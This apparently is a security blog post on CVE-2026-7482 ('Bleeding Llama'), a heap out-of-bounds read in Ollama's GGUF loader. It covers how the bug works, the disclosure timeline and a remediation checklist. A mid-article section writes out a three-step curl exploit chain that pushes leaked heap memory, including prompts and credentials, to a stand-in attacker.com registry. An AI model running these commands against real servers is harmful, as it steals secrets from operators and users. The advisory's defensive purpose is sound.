Bleeding Llama: Ollama's "Heartbleed Moment" and What It Means for Self-Hosted AI

How a missing bounds check in a GGUF parser lets attackers silently siphon secrets from 300,000 exposed servers — and why this should change how you think about local AI infrastructure.

The Short Version

CVE-2026-7482, nicknamed "Bleeding Llama," is an unauthenticated heap out-of-bounds read in Ollama's GGUF model loader. An attacker can exfiltrate the entire process memory of any internet-facing Ollama server using three API calls. No credentials required. No error logs generated.

The leaked data includes user prompts, system prompts, API keys, cloud credentials, and environment variables.

Approximately 300,000 Ollama servers are exposed on the public internet right now. If yours is one of them and you haven't patched, assume compromise. Rotate every secret that touched that server.

Why "Heartbleed for AI" Isn't Hyperbole

In 2014, Heartbleed (CVE-2014-0160) shocked the industry — a simple missing bounds check in OpenSSL let attackers read server memory, leaking private keys, session tokens, and user data at scale. The vulnerability was trivial to exploit, silent, and affected an estimated 500,000 servers.

Bleeding Llama is the same pattern, replayed in the AI inference layer:

Heartbleed (2014)	Bleeding Llama (2026)
OpenSSL TLS extension	Ollama GGUF model loader
Missing bounds check on heartbeat length	Missing bounds check on tensor shape
Read past buffer into heap memory	Read past buffer into heap memory
Exfiltrate via malformed TLS response	Exfiltrate via model push to attacker registry
~500K servers exposed	~300K servers exposed

The parallels are striking — and the lesson is the same: memory safety bugs in widely deployed infrastructure have catastrophic tail risk.

How the Attack Works

Understanding the attack requires a quick detour into how Ollama handles model files.

GGUF: The Model File Format

GGUF (GPT-Generated Unified Format) is the standard for storing LLM weights efficiently. A GGUF file contains:

Header — metadata including tensor count, format version
Tensor descriptors — each tensor's name, shape (dimensions), data type, and offset
Tensor data — the actual weights

The shape field matters here. A tensor with shape (3, 3, 3) contains 27 elements. Ollama multiplies the dimensions to calculate how many elements to read.

The Bug

When you create a model via Ollama's /api/create endpoint with a GGUF file, Ollama parses the tensor descriptors and reads tensor data based on the declared shape — not the actual file size.

Here's the vulnerable path:

/api/create → convertModelFromFiles → createModel → quantization → WriteTo → ConvertToF32

In ConvertToF32, Ollama calls:

ggml_fp16_to_fp32_row(src_ptr, output_buffer, tensor.Elements())

Where tensor.Elements() comes directly from the GGUF file's shape field. If an attacker crafts a GGUF with shape set to 1 million elements but only provides 1KB of actual data, Ollama happily reads 999KB of adjacent heap memory.

And because Ollama uses Go's unsafe package for these low-level operations, the usual memory safety guarantees don't apply. No panic. No crash. Just silent data theft.

Keeping the Data Readable

Most quantization formats are lossy — converting between precisions corrupts the leaked bytes. The attacker bypasses this by:

Setting tensor type to F16
Requesting F32 as target format

F16 → F32 is lossless (2 bytes to 4 bytes, no precision loss). The heap data arrives intact on the attacker's server.

The Three-Call Exploit Chain

Step 1: Upload the payload

curl -X POST http://target:11434/api/blobs/sha256:$(sha256sum malicious.gguf | cut -d' ' -f1) \
  --data-binary @malicious.gguf

Step 2: Trigger the memory leak

curl -X POST http://target:11434/api/create \
  -d '{"model": "http://attacker.com/stolen/model:tag", "files": {"model": "malicious.gguf"}, "quantize": "f32"}'

Step 3: Exfiltrate

curl -X POST http://target:11434/api/push \
  -d '{"model": "http://attacker.com/stolen/model:tag"}'

The model — now containing heap memory — gets pushed to the attacker's registry. Reversing the quantization reveals:

User prompts from other sessions
System prompts from other models on the same server
Environment variables (often containing API keys, database credentials, cloud secrets)
Fragments of tool outputs if Ollama is connected to coding assistants

All captured silently. No logs. No errors.

Why 300,000 Servers Are Exposed

Ollama binds to 127.0.0.1 by default — safe if you're running it locally. But the common OLLAMA_HOST=0.0.0.0 setting opens it to all interfaces.

The problem: Ollama's REST API has no authentication. Zero. The /api/create, /api/push, and /api/blobs endpoints that enable this attack are completely open by default.

This isn't a misconfiguration — it's the documented behavior. Ollama was designed for local use. The community scaled it to production infrastructure without adding the auth layer that production requires.

The Disclosure Timeline Made It Worse

Feb 25, 2026: Patch shipped in v0.17.1
Feb 25, 2026: Release notes did not flag it as a security fix
May 1, 2026: CVE finally published

That's a 64-day window where a critical vulnerability was patched but invisible to scanners, security tools, and patch management systems. Operators running vulnerable versions had no signal to prioritize the update.

This is a systemic problem. MITRE's CVE assignment backlog (2+ months in this case) creates dangerous gaps between patch availability and operator awareness. The researcher escalated to Echo, a third-party CNA, to finally get the CVE published.

What's Actually in Heap Memory?

The heap persists across requests, accumulating data from everything the Ollama process has touched since its last restart:

User prompts — every question asked of every model
System prompts — often containing proprietary instructions, personas, or confidential context
Environment variables — API keys, database URLs, cloud credentials
Tool outputs — if you've connected Ollama to Claude Code, Cursor, or similar tools, their outputs flow through the heap

In an enterprise setting where Ollama serves thousands of employees, the heap becomes a treasure trove. Attacker motivation is high.

The Broader Pattern: AI Infrastructure Has the Security Posture of 2005

Bleeding Llama isn't an isolated incident. The self-hosted AI ecosystem is repeating mistakes we solved in web infrastructure decades ago:

Default configurations are dangerous. Ollama binds to all interfaces with no auth. This is fine for a developer's laptop and catastrophic for a shared server.

No auth by default. The REST API trusts all callers implicitly. Compare to any modern database — even SQLite has WAL mode protections against concurrent access issues.

File format parsers are trust boundaries. GGUF files can come from anywhere. Treating their metadata as trustworthy is the same class of mistake that gave us image parsing RCEs, PDF exploits, and font rendering vulnerabilities.

"Local-first" doesn't mean "local-only." Tools designed for local use get deployed to production. The assumption that the caller is benign doesn't survive contact with the internet.

Remediation Checklist

Immediate (do this now)

Update to Ollama v0.17.1+

ollama --version
# If < 0.17.1, update immediately

Audit all Ollama instances
- Check for OLLAMA_HOST=0.0.0.0 in configs
- Scan for port 11434 exposed to untrusted networks
If your instance was internet-accessible before patching:
- Assume compromise
- Rotate ALL secrets: API keys, database credentials, cloud tokens
- Review logs for suspicious /api/create or /api/push activity

Hardening (do this next)

Bind to localhost only — Remove OLLAMA_HOST=0.0.0.0 from production unless strictly required
Deploy an auth proxy — Put nginx, Caddy, or an API gateway with authentication in front of Ollama
Network segmentation — Ollama should not be reachable from the internet or untrusted network segments
Don't pass secrets as env vars — If Ollama doesn't need the credential, don't give it to the process
Monitor the endpoints — Alert on /api/create and /api/push calls, especially those referencing external registries

For Windows Users

Two additional unpatched vulnerabilities affect Ollama for Windows (v0.12.10 through v0.17.5):

CVE-2026-42248: Missing signature verification on updates
CVE-2026-42249: Path traversal in the updater

Disable automatic updates and remove the Startup folder shortcut until patches ship.

The Meta-Lesson

Every new infrastructure layer recapitulates the security history of the layers beneath it. Containers repeated VM escape bugs. Kubernetes repeated container isolation bugs. LLM inference engines are now repeating memory safety bugs.

The optimistic read: we know how to fix this. Bounds checking, authentication, principle of least privilege, secure defaults — none of this is novel. The tooling exists.

The pessimistic read: we keep not doing it. Speed-to-market pressures, "it's just for local use," and the assumption that open-source scrutiny will catch bugs all contribute to a posture where critical infrastructure ships without basic security controls.

Bleeding Llama is Ollama's wake-up call. The question is whether the broader self-hosted AI ecosystem learns from it — or waits for the next CVE-9.1 to find out what was in their heap memory.

If you're running Ollama in production: patch now, rotate secrets, and add that auth proxy you've been putting off. The patch has been available since February. The CVE has been public for weeks. The exploit is trivial. There's no excuse left.

Sources: Cyera Research (original disclosure), Indusface, The Hacker News, NVD. CVE-2026-7482 assigned by Echo CNA (April 2026).

Bleeding Llama: Ollama's 'Heartbleed Moment' and What It Means for Self-Hosted AI

Sumeet Zankar